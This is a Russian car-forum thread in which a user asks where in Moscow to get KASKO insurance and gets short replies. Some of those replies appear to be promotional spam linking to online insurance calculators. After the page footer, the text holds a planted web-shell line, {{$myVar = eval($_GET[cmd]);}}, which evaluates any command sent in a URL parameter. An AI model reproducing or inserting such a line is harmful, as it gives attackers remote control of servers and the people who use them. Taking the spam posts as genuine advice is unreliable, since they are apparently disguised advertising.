+ Ответить в теме
Показано с 1 по 7 из 7

Тема: В какую страховую лучше обратиться за оформлением КАСКО?


  1. #1
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136

    В какую страховую лучше обратиться за оформлением КАСКО?

    ОСАГО как обязательная страховка автомобиля у меня есть, однако по ней в случае ДТП я никакой компенсации не получу, от нее разве что получать компенсацию третьи лица пострадавшие в ней( Хорошо все обдумав решил что оформлю КАСКО от греха по-дальше, но где лучше в МСК это сделать?

  2. #2
    КАСКО в два раза дороже ОСАГО, но если можете себе позволить - заказывайте. Страховых компаний в МСК - валом, лучше всего для выбора используйте сайты отзовики - на них очень просто сразу выделить самые топовые компании)

  3. #3
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Если вашему автомобилю больше 7-ми лет - лучше не оформляйте. Вам там такую цену зажмут за страховку, что вряд ли вы на такое подпишитесь. ОСАГО - обязательная страховка, по сути если попадете в ДТП, то по ОСАГО второго участника ДТП, его страховая должна все ваши расходы покрыть.

  4. #4
    Проще всего оформлять КАСКО, как и ОСАГО онлайн, например через Smart - https://smartosago.com/ . Никуда ехать не надо, все оформляется через сайт, тем более обычно через интернет всегда немного дешевле - наверное это связано с тем, что онлайн конторе нужен меньший состав работников ну или просто меньше затраты на аренду помещений. Не знаю, но лично я разницу, не особо значительную в ценах между онлайн ресурсами и офлайн страховыми замечал.

  5. #5
    Мимо проходил tehno-music is on a distinguished road Аватар для tehno-music
    Регистрация
    17.08.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    3
    Цитата Сообщение от Serf Посмотреть сообщение
    ОСАГО как обязательная страховка автомобиля у меня есть, однако по ней в случае ДТП я никакой компенсации не получу, от нее разве что получать компенсацию третьи лица пострадавшие в ней( Хорошо все обдумав решил что оформлю КАСКО от греха по-дальше, но где лучше в МСК это сделать?
    Воспользуйтесь специальными сервиса по калькуляции КАСКО и ОСАГО и вы сами поймете куда лучше вам обратиться с вашей модификацией автомобиля. Вот в этот например: https://www.driver-helper.ru/calculator/osago (первый что выдал мне гугл). Там введете все характеристики вашей машины и получите лучшие варианты по цене с контактными данными каждой из компаний.
    Хорошая клубная музыка - это пожалуй лучшее что можно получить сегодня бесплатно.

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Руслан, добрый день! Были обращения по убыткам в Согласие? Печать о браке в паспорте имеется? Дети?(это, если в Ингоссе считать. Там доп скидки за эту малину). Пробег? Можно еще узнать пролонгацию по Согласию, но нужен номер полиса

  7. #7
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Нет, там всё нормально с этим. Но меня просто цены перестали устраивать, скажем так) Я просто еще и узнал про онлайн-сервис ОсагоОнлайн https://osagoonline.ru/ и смог найти тут кучу вариантов, в том же РосГосСтрахе или ИГС, что собственно выгоднее в разы, поэтому принял решение перейти на их обслуживание) Всё-таки оно в месяц если подсчитывать, то немного получается, а вот так на весь срок страхования смотришь, то понимаешь что денег может немало уходить на полис

+ Ответить в теме

Похожие темы

  1. к кому обратиться по AGU ?
    от makos в разделе Golf 4
    Ответов: 23
    Последнее сообщение: 03.07.2023, 01:53
  2. Ответов: 1
    Последнее сообщение: 22.01.2019, 13:10
  3. Ответов: 3
    Последнее сообщение: 20.01.2019, 12:05
  4. Какую страховую выбрать?
    от Max в разделе Законодательство и страхование
    Ответов: 13
    Последнее сообщение: 26.05.2012, 16:36
  5. Ответов: 29
    Последнее сообщение: 02.03.2011, 01:37

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}